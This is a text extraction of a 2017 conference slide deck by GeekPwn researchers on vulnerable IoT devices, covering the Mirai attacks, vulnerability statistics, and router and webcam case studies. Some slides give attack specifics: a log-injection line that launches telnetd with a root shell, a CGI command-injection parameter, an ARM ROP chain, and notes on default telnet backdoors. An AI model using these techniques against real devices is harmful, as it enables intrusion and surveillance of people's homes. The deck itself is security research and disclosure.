Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT


Published on


Published in: Internet
  • Be the first to like this

CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT

  1. 1. Cyber WMD: Vulnerable IoT Yuhao Song & Huiming Liu GeekPwn Lab
  2. 2. About Us • An co-founder and researcher of KEEN • Working on GeekPwn program, focusing on security of IoT and smart devices. • A security researcher at XuanWu Lab, Tencent. • IoT and Android security • A security contest & a bug bounty program organized by KEEN since 2014 Yuhao Song (宋宇昊) Huiming Liu (刘惠明) GeekPwn
  3. 3. Situations of IoT Security Most Vulnerable Categories in IoT Attack Vectors of IoT IoT Can Do Evil Contents
  4. 4. Situations of IoT Security
  5. 5. Mirai Incidents Target Traffic KrebsonSecurity 620Gbps OVH ISP 1.1Tbps Dyn 1.2Tbps Liberia 500Gbps WikiLeaks Russian Banks * The data is from ”Rise of the Machines: The Dyn Attack Was Just a Practice Run” * The Picture is from DownDetector - DownDetector Level 3 Outage Map,CC BY-SA 4.0 , 100,000 devices
  6. 6. How Does Mirai Attack? Main Targets IoT Devices Wi-Fi Router IP Camera Attack Vector • Remote Shell • Port Scan (Looking for telnet, ssh, etc.) • Dictionary Attack • (Based on generic and manufacturer default credential)
  7. 7. “Smart Routers Arena” • In 2014, GeekPwn began to accept routers’ vulnerabilities • In Oct. 2015, a special session for routers to reveal their security problems • During 2014~2016, 32 vulnerabilities of routers • Our routers are streaking Covering all the top brands of routers in China Half of them are popular globally Resulting in remote root access Other than shell of weak password Of 18 top-selling models Of 11 brands
  8. 8. “ Now this is not the end. It is not even the beginning of the end. But it is, perhaps, the end of the beginning.” -- Winston Churchill
  9. 9. Situations of IoT Security Large amounts of vulnerabilities • Emerging market • Manufacturers are focusing on implementing products’ core functions while ignoring security • In a recruitment website for startups, we found 3K+ IoT companies. But none is looking for security engineers • Immature standards • Manufacturers don’t have methods to measure and assure products’ security Weapon of Mass Destruction • Huge amounts of devices • 8.4 billions in 2017 estimated by Gartner • Always online • Hard to notice abnormal behaviors (no/small screen) • Close to users’ daily-life
  10. 10. IoT Vulnerabilities in GeekPwn • We noticed security problems in emerging market and launched GeekPwn in 2014 • All the vulnerabilities are high risk and result in full control of the target (PWN). • Most of the vulnerabilities are easy and straightforward. Non Memory Level 71% Memory Corruption 29% Single Vuln Exploit 63% Combo Exploit 37% Source:
  11. 11. Most Vulnerable Categories in IoT
  12. 12. Those Pwned Mirai IoT Wi-Fi Router POS machine Digital Safe Robot Drone Communication Protocol Computer Software IP Camera Smart Remote Control Smart Home Device Wearable Device Video Game Console App Mobile Phone
  13. 13. Wi-FiRouter 28%MobilePhone 18% SmartHome Device 15% IPCamera 11% App 11% DigitalSafe 4% POSmachine 3% Drone 3% WearableDevice 2% VideoGameConsole 2% Robot 1% CommunicationProtocol 1% SmartRemoteControl 1% other 17% Wi-Fi Router Mobile Phone Smart Home Device IP Camera App Digital Safe POS machine Drone Wearable Device Video Game Console • GeekPwn is an open contest. The contestants choose their own target. • Fewer vulnerabilities are reported in some categories (especially new categories). • They don’t require Memory Corruption attack. • They are not necessarily secure but just neglected. Blind Spot Vulnerabilities in different product category 0 5 10 15 20 25 30 35 0.00% 20.00% 40.00% 60.00% 80.00% 100.00% Wi-FiRouter MobilePhone SmartHomeDevice IPCamera App DigitalSafe POSmachine Drone WearableDevice VideoGameConsole Robot CommunicationProtocol SmartRemoteControl Mem Vuln % Total Vuln Num Source:
  14. 14. Attack Vectors of IoT
  15. 15. All Roads Lead to Pwn Memory Corruption Attacks 31% Insecure Communicati on Abuse 11% Abuse of Functionality 10% Logical Input Manipulation 9% Code Injection 7% Hard-coded Crypto Key 6% other 26% Remote Information Exposure 4%Spoofing 4% Security Mechanism Bypass 4% Other 4% Remote Shell with No/Weak Auth 4% Forced Access 3% Side Channel 3% Source:
  16. 16. Insecure Communication Abuse • Vulnerability • Sensitive information transmitted over unencrypted channel • Exploit • Sniffing to get the credential / session ID, and then replay Digital safe <Real case in GeekPwn 2016> • Tool • Network Sniffer • MITM HTTP(S) Proxy • Ubertooth One (Bluetooth)
  17. 17. • <Real Case in GeekPwn 2015> • It’s one of the steps in a case exploiting a combination of 6 vulnerabilities. The purpose is to upload a script file to the target device. • Vulnerability • A network logging service is enabled on the device, and it doesn’t make appropriate filtering before writing log to the file system. • Exploit • Clear the previous log • Send traffic to create a log file containing shell script <11> syslog-ng[1787]: 1; /usr/sbin/telnetd -l /bin/ashn Abuse of Functionality
  18. 18. Logical Input Manipulation • Vulnerability • Server side incorrectly trust the parameter (e.g. User ID) provided by the client. • Exploit • Send the manipulated parameter to the server (e.g. and act as another user) Payment service <Real case in GeekPwn 2015> Beep! Paying from Bob’s account.
  19. 19. Code Injection • <Real Case in GeekPwn 2016> • Vulnerability • In CGI service, an parameter is accepted and finally passed to “system” call without appropriate filtering. • Exploit • Send the request with parameter ../xxxx/&&telnetd&& to CGI
  20. 20. Hard-coded Crypto Key • Vulnerability • Symmetric-key algorithm is used, and the key is hard-coded in the client program. • Exploit • Reverse engineer the client, and get the key. • Decrypt / Encrypt the data. Smart luggage <Real case in GeekPwn 2016>
  21. 21. Case Study
  22. 22. Cases Chain • Get Root Shell of a Router From Internet • Get Login Password of a WebCam • Compromise your home security alarm
  23. 23. Vulnerabilities Chains To Fun & Profit • Fewer attack surfaces • Limited access capabilities • Limited compute capabilities • Close-source firmware • Cheap but huge amount
  24. 24. • Opening port(especially exposed on Internet) • Configuration Port. 80/443 • Other Port. Nmap/ Netstat • Other Vulnerability • Dns cache? • MITM? Remotely get file Breakthrough
  25. 25. Get Opening port • Dynamic method • Nmap • Netcat • etc… • In this case, 9000 port is open • New feature? • Static method • Get the firmware • Hexdump grep (regular expression matching) • Get the binary • Reverse to find the bug on the port
  26. 26. From Access to Control • IDA reverse the file • Working... • More Working… • More and More Working… • Finally, Get the vulnerabilities
  27. 27. Router A step 0 XXX Router ETM Process Etm_configure function Parse INI File EVIL License_server Stack Overflow
  28. 28. Router A step 0
  29. 29. Router A step1 XXX Router ETM Process INI File GOOD License_server INI File Inject INI File EVIL License_server
  30. 30. Router A step 2 XXX Router ETM Process INI File EVIL License_server Reload INI File EVIL License_server Unauthorized Restart CMD
  31. 31. Router A step 3 XXX Router ETM Process Callback Parse Function snprintf return value misuse INI File Information Leak
  32. 32. snprintf
  33. 33. Router A step 3
  34. 34. Router A step 3
  35. 35. Exploit A step 0 Exploit A step 1 XXX Router ETM Process INI File GOOD License_server XXX Router ETM Process Callback Parse Function snprintf return value misuse INI File INI File InjectInformation Leak INI File EVIL License_server
  36. 36. Router A step 2 Router A step 3 XXX Router ETM Process Etm_configure function Parse INI File EVIL License_server XXX Router ETM Process INI File EVIL License_server Reload INI File EVIL License_server Stack Overflow Unauthorized Restart CMD
  37. 37. Router A Exploit step 0 CMD to Excute Wonderful Gadget 0x43434343 system Gadget 0x42424242 0x42424242 0x42424242 Pop Reg Gadget SP Pop Reg Gadget # 26cd0: pop {r0, r1, r2, r3, r4, Ir} # 26cd4: bx Ir
  38. 38. Router A Exploit step 1 CMD to Excute Wonderful Gadget 0x43434343 system Gadget 0x42424242 0x42424242 0x42424242 Pop Reg Gadget SP LR R4 R3 R2 R0 R1
  39. 39. Router A Exploit step 2 Wonderful Gadget: #.text:0003F184 MOV RO, SP #.text:0003F188 MOV LR, PC #.text:0003F18C BX R3 Wonderful Gadget 0x43434343 system Gadget 0x42424242 0x42424242 0x42424242 Pop Reg Gadget SP PC R4 R3 R2 R0 R1 CMD to Excute N bytes
  40. 40. Router A Exploit step 3 Wonderful Gadget 0x43434343 system Gadget 0x42424242 0x42424242 0x42424242 Pop Reg Gadget R0 LR R4 PC R2 R0 R1 CMD to Excute N bytes Wonderful Gadget: #.text:0003F184 MOV RO, SP #.text:0003F188 MOV LR, PC #.text:0003F18C BX R3
  41. 41. Attack Surface Ming: $ nmap -Pn -p8999-9001 xx.xx.xx.xx Starting Nmap 6.47 at 2017-02-19 17:25 CST Nmap scan report for Host is up (0.010s latency). PORT STATE SERVICE 8999/tcp filtered bctp 9000/tcp open cslistener 9001/tcp filtered tor-orport
  42. 42. Similar Vulnerabilities • Router B (can get root shell) • Open Port 515 • Many devices Exposed on Internet • strcpy overflow (parse queue_name) • Stack pivot->leak write@got to bypass ASLR ->ROP to excute system • WebCam C(can get root shell) • Open Port UDP 8600 • Strcpy overflow(user, passwd) LOL • Visit for more information.
  43. 43. Router B on the internet
  44. 44. Then What? • We are in LANs • DDos tools • Traffic monitor & hijack • More? • Watch you, literal watch • Everything in attacks’ eyes from pwned WebCam • WebCam D demo
  45. 45. WebCam D • Backdoor 1 • Get the administrator’s username and password directly • Send some Magic strings • Backdoor 2 • Telnet on the webcam • Default telnet backdoor (root, xxxxxx) • visit for more information
  46. 46. What can attackers do? • Scan the internet to find the vulnerable devices • Get the root shell of the router or webcam • Surfing the LAN • Watch even control you by your vulnerable IOT devices • Demo video
  47. 47. What may you lose now in this case? • Your online privacy (even worse on http) • Your online account and password (MITM) • Your daily life privacy (Obviously) • Your credit card information (If you ever had shown it somewhere in WebCams’ view) • More?
  48. 48. Information and Property loss
  49. 49. What can we learn from demos?
  50. 50. IoT Can Do Evil
  51. 51. IoT Can Be Peeper n Locating user’s child n Monitoring network traffic n Hijacking network traffic n Watching the user, literally
  52. 52. IoT Can Be Thief n Query Transactions n Steal Money n Monitor user’s life pattern n Turn on/off user’s appliance n Disable intrusion alarm n (For fun) Send out a weibo (“Chinese Twitter”) from a socket n Unlock user's door
  53. 53. IoT Can Be Hijacked n Be hijacked to fly away n Be hijacked to eavesdrop
  54. 54. “God’s Eye” in Furious 7
  55. 55. Q&A Yuhao Song @yuhaos Huiming Liu @liuhm09 GeekPwn @GeekPwn